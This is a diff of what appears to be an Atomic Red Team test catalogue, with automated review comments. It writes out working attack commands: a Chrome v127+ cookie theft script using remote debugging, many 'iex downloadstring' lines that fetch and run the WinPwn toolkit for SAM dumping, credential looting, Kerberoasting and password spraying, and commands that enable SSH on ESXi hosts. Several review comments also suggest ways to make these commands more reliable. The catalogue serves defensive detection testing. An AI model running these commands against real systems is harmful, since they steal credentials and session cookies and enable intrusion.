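Review bot: The hand-typed symbol array in the new `get_prereq_command` contains duplicate entries, `'(','('` and `';',';'`, which read as typos and slightly over-weight those two characters. The fix itself is right: the old `Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12` passed a single string object, so every one of the ten "passwords" was the whole character set. The same result is obtained without the arrays by casting the set to a char array, e.g. `-join ((1..12) | ForEach-Object { [char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?' | Get-Random })`, which is easier to verify by eye and avoids the duplicates.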
@@ -67268,7 +67627,7 @@ collection:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f
reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /f
cleanup_command: 'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI"
/v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
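Review bot: Changing the first command to `reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f` has no observable effect, because the unchanged next line `reg delete ... /v DisableAIDataAnalysis /f` removes the value again immediately; before and after this hunk the executor leaves the value absent. Decide which end state the test is meant to produce, the policy explicitly set to 0 or the policy value removed so the default applies, and keep only that command. The cleanup `reg add ... /d 1 /f` restores the disabled state in either case, so it needs no change.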
@@ -70568,7 +70927,96 @@ lateral-movement:
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.004
atomic_tests: []
atomic_tests:
- name: ESXi - Enable SSH via PowerCLI
auto_generated_guid: 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
description: 'An adversary enables the SSH service on a ESXi host to maintain
persistent access to the host and to carryout subsequent operations.
'
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name of the ESXi Server
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on ESXi Server
type: string
default: root
vm_pass:
description: Specify the privilege user password on ESXi Server
type: string
default: pass
dependency_executor_name: powershell
dependencies:
- description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
'
prereq_command: |
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
get_prereq_command: 'Install-Module -Name VMware.PowerCLI
'
executor:
command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
-Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
#{vm_pass}\nGet-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key
-eq \"TSM-SSH\" } | Start-VMHostService -Confirm:$false\n"
cleanup_command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore
-ParticipateInCEIP:$false -Confirm:$false \nConnect-VIServer -Server #{vm_host}
-User #{vm_user} -Password #{vm_pass}\nGet-VMHostService -VMHost #{vm_host}
| Where-Object {$_.Key -eq \"TSM-SSH\" } | Stop-VMHostService -Confirm:$false\n"
name: powershell
elevation_required: true
- name: ESXi - Enable SSH via VIM-CMD
auto_generated_guid: 280812c8-4dae-43e9-a74e-1d08ab997c0e
description: |
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
'
cleanup_command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
'
name: command_prompt
elevation_required: false
T1091:
technique:
modified: '2023-10-17T20:42:21.453Z'
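Review bot: In the VIM-CMD test, `echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"` will abort on the first connection to any ESXi host whose SSH host key is not already in the PuTTY cache, because `-batch` suppresses the host-key prompt rather than answering it; the piped empty string does nothing in that mode. Either drop `-batch` and pipe `y` to accept the key, or pass `-hostkey` with the host's fingerprint. Same for the cleanup command. In the PowerCLI test, `Connect-VIServer` is called in both the command and the cleanup but neither ends with `Disconnect-VIServer`, so sessions accumulate on the host, and `Install-Module -Name VMware.PowerCLI` in `get_prereq_command` will stop on the untrusted-repository prompt in an unattended run unless `-Force` (and typically `-Scope CurrentUser`) is added. Minor: the two tests disagree on `elevation_required` (`true` vs `false`) although neither needs local admin on the Windows runner; and the descriptions have "creeate", "carryout" and "privilege user account" (privileged).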
@@ -71615,7 +72063,7 @@ lateral-movement:
description: Ticket file name usually format of 'id-username\@domain.kirbi'
(e.g. can be dumped by "sekurlsa::tickets /export" module)
type: string
default:
default:
mimikatz_exe:
description: Path of the Mimikatz binary
type: path
@@ -73835,6 +74283,50 @@ credential-access:
'
name: powershell
elevation_required: false
- name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
description: |-
Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
Note: Will stop any instances of Chrome already running
Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
supported_platforms:
- windows
executor:
command: |-
$devToolsPort = 9222
$testUrl = "https://www.google.com"
stop-process -name "chrome" -force -erroraction silentlycontinue
$chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
Start-Sleep 10
$jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
$devToolsPages = ConvertFrom-Json $jsonResponse.Content
$ws_url = $devToolsPages[0].webSocketDebuggerUrl
$ws = New-Object System.Net.WebSockets.ClientWebSocket
$uri = New-Object System.Uri($ws_url)
$ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
$GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
$buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
$segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
$ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
$completeMessage = New-Object System.Text.StringBuilder
do {
$receivedBuffer = New-Object byte[] 2048
$receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
$result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
$receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
$completeMessage.Append($receivedString)
} while (-not $result.EndOfMessage)
$ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
try {
$response = ConvertFrom-Json $completeMessage.ToString()
$cookies = $response.result.cookies
} catch {
Write-Host "Error parsing JSON data."
}
Write-Host $cookies
Stop-Process $chromeProcess -Force
name: powershell
elevation_required: false
T1003.002:
technique:
modified: '2024-10-15T16:40:52.174Z'
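Review bot: When the JSON parse in the `try` fails, `$cookies` is never assigned, `Write-Host $cookies` prints an empty line and the test still exits 0, so a run that retrieved nothing looks like a pass; put `exit 1` in the `catch`, and check `$response.id -eq 1` and that `$response.result.cookies` is non-empty before printing. Two robustness points on the same block: `$ws_url = $devToolsPages[0].webSocketDebuggerUrl` takes whatever target Chrome lists first, which need not be the page opened with `$testUrl` (extension and worker targets appear in `/json` too), so filter on `type -eq 'page'`; and the fixed `Start-Sleep 10` should be a short poll loop against `http://localhost:$devToolsPort/json` so the test neither fails on slow hosts nor waits needlessly on fast ones. Since the test kills the user's running browser (`stop-process -name "chrome" -force`) and echoes live session cookies to the console, the description's note is appropriate; consider also stating it in the test name.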
@@ -74075,8 +74567,7 @@ credential-access:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
-consoleoutput -noninteractive "
name: powershell
- name: Dumping of SAM, creds, and secrets(Reg Export)
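Review bot: Removing `$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'` ahead of `iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')` is only safe if WinPwn.ps1 at that pinned commit sets the variable itself (or no longer reads it) when it fetches its helper modules; a missing variable would not error at load time but would surface later as a failed download inside `samfile`. Please confirm that against the pinned script, since this diff makes the same removal in every other WinPwn executor it touches (the credential-access and discovery tests from `wificreds` through `fruit`), and while checking, verify that the helper downloads the script performs resolve to the same pinned commit rather than the repository's default branch, otherwise the hash pin on the loader buys little.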
@@ -75681,7 +76172,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
lazagnemodule -consoleoutput -noninteractive
name: powershell
@@ -75692,8 +76182,7 @@ credential-access:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds
-consoleoutput -noninteractive "
name: powershell
- name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
@@ -75703,8 +76192,7 @@ credential-access:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer
-consoleoutput -noninteractive "
name: powershell
T1552:
@@ -76094,9 +76582,10 @@ credential-access:
Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force
Remove-Item "#{file_path}\Modified-SysInternalsSuite.zip" -Force
executor:
command: |
Set-Location -path "#{file_path}\Sysinternals";
./accesschk.exe -accepteula .;
command: 'Start-Process "#{file_path}\Sysinternals\accesschk.exe" -ArgumentList
"-accepteula ."
'
cleanup_command: 'Remove-Item "#{file_path}\Sysinternals" -Force -Recurse
-ErrorAction Ignore
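Review bot: `Start-Process "#{file_path}\Sysinternals\accesschk.exe" -ArgumentList "-accepteula ."` returns immediately and runs accesschk in its own console, so its output no longer appears in the executor's session and a failure is not propagated; add `-NoNewWindow -Wait`. It also changes what is enumerated: the removed `Set-Location -path "#{file_path}\Sysinternals"` made `.` the Sysinternals folder, whereas now `.` is whatever directory the runner happens to be in. Either pass `-WorkingDirectory "#{file_path}\Sysinternals"` to Start-Process or keep a direct invocation, e.g. `& "#{file_path}\Sysinternals\accesschk.exe" -accepteula "#{file_path}\Sysinternals"`, which also preserves the exit code.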
@@ -76437,7 +76926,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
browserpwn -consoleoutput -noninteractive
cleanup_command: rm .\System.Data.SQLite.dll -ErrorAction Ignore
@@ -76450,7 +76938,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
kittenz -consoleoutput -noninteractive
name: powershell
@@ -77910,7 +78397,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
domainpassspray -consoleoutput -noninteractive -emptypasswords
name: powershell
@@ -78660,7 +79146,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
name: powershell
@@ -78672,7 +79157,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
name: powershell
@@ -78684,7 +79168,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
name: powershell
@@ -78695,7 +79178,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
cleanup_command: |-
@@ -78714,7 +79196,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
name: powershell
@@ -78726,8 +79207,7 @@ credential-access:
supported_platforms:
- windows
executor:
command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
-consoleoutput -noninteractive "
name: powershell
- name: List Credential Files via PowerShell
@@ -81273,7 +81753,7 @@ credential-access:
description: command flags you would like to run (optional and blank by
default)
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'Computer must be domain joined
@@ -81401,7 +81881,6 @@ credential-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive
name: powershell
@@ -82540,7 +83019,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPOAudit -noninteractive -consoleoutput
name: powershell
@@ -82552,7 +83030,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPORemoteAccessPolicy -consoleoutput -noninteractive
name: powershell
@@ -82673,7 +83150,7 @@ discovery:
command: |
driverquery /v /fo list
driverquery /si /fo list
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
T1087.002:
@@ -82824,7 +83301,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -82857,7 +83334,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -82889,7 +83366,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -82921,7 +83398,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -83069,7 +83546,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
name: powershell
@@ -83146,7 +83622,7 @@ discovery:
default: "$env:computername"
executor:
command: 'Get-ADComputer #{hostname} -Properties *'
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
@@ -83162,7 +83638,7 @@ discovery:
default: "$env:computername"
executor:
command: 'Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime'
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with Get-ADComputer all properties and
@@ -83176,7 +83652,7 @@ discovery:
executor:
command: Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties
*
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with adfind all properties
@@ -83191,7 +83667,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
domain:
description: Domain of the host
type: string
@@ -83201,7 +83677,7 @@ discovery:
-h #{domain} -s subtree -f "objectclass=computer" *
'
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
- name: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
@@ -83216,7 +83692,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
domain:
description: Domain of the host
type: string
@@ -83226,7 +83702,7 @@ discovery:
-h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
'
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
T1087.001:
@@ -83343,6 +83819,48 @@ discovery:
'
name: command_prompt
- name: ESXi - Local Account Discovery via ESXCLI
auto_generated_guid: 9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c
description: |
An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)"
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli system account list"
'
name: command_prompt
elevation_required: false
T1497.001:
technique:
modified: '2024-09-12T15:50:18.047Z'
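Review bot: The stray `"` at the end of `[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)"` sits inside a `description: |` literal block, so it is emitted verbatim into the rendered description; remove it. The executor has the same limitation as the T1021.004 plink test: with `-batch`, plink aborts on an uncached host key instead of prompting, so `echo "" |` does not help on first contact with the ESXi host; drop `-batch` and pipe `y`, or supply `-hostkey`. Also "privilege user account" should read "privileged user account", matching the `vm_pass` description just below it.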
@@ -83667,7 +84185,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -84181,7 +84699,7 @@ discovery:
auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
description: |
Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
Upon execution avalaible network shares will be displayed in the powershell session
Upon execution available network shares will be displayed in the powershell session
supported_platforms:
- windows
input_arguments:
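Review bot: While fixing the spelling, "Upon execution available network shares will be displayed in the powershell session" still wants a comma after "execution"; the PowerShell variant in the next hunk already has it ("Upon execution, available network shares ..."), and the `dir`-based test later in this diff has the same missing comma.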
@@ -84198,7 +84716,7 @@ discovery:
auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
description: |
Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
Upon execution, avalaible network shares will be displayed in the powershell session
Upon execution, available network shares will be displayed in the powershell session
supported_platforms:
- windows
executor:
@@ -84209,7 +84727,7 @@ discovery:
- name: View available share drives
auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
description: View information about all of the resources that are shared on
the local computer Upon execution, avalaible share drives will be displayed
the local computer Upon execution, available share drives will be displayed
in the powershell session
supported_platforms:
- windows
@@ -84277,7 +84795,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
shareenumeration -noninteractive -consoleoutput
name: powershell
@@ -84285,7 +84802,7 @@ discovery:
auto_generated_guid: 13daa2cf-195a-43df-a8bd-7dd5ffb607b5
description: |
Network Share Discovery utilizing the dir command prompt. The computer ip variable may need to be modified to point to a different host ip
Upon execution avalaible network shares will be displayed in the commandline session
Upon execution available network shares will be displayed in the commandline session
supported_platforms:
- windows
input_arguments:
@@ -84436,7 +84953,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
printercheck -noninteractive -consoleoutput
name: powershell
@@ -84633,7 +85149,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput
name: powershell
@@ -84645,7 +85160,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput
name: powershell
@@ -84656,7 +85170,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput
cleanup_command: |-
@@ -84673,7 +85186,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput
name: powershell
@@ -84685,7 +85197,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive
name: powershell
@@ -84697,7 +85208,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput
name: powershell
@@ -84709,7 +85219,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive
name: powershell
@@ -84962,7 +85471,37 @@ discovery:
- windows
executor:
name: command_prompt
command: powershell.exe -c "gdr -PSProvider 'FileSystem'"
command: 'powershell.exe -c "gdr -PSProvider ''FileSystem''"
'
- name: Discover OS Product Name via Registry
auto_generated_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7
description: |
Identify the Operating System Product Name via registry with the reg.exe command.
Upon execution, the OS Product Name will be displayed.
supported_platforms:
- windows
executor:
command: 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v
ProductName
'
name: command_prompt
elevation_required: false
- name: Discover OS Build Number via Registry
auto_generated_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec
description: |
Identify the Operating System Build Number via registry with the reg.exe command.
Upon execution, the OS Build Number will be displayed.
supported_platforms:
- windows
executor:
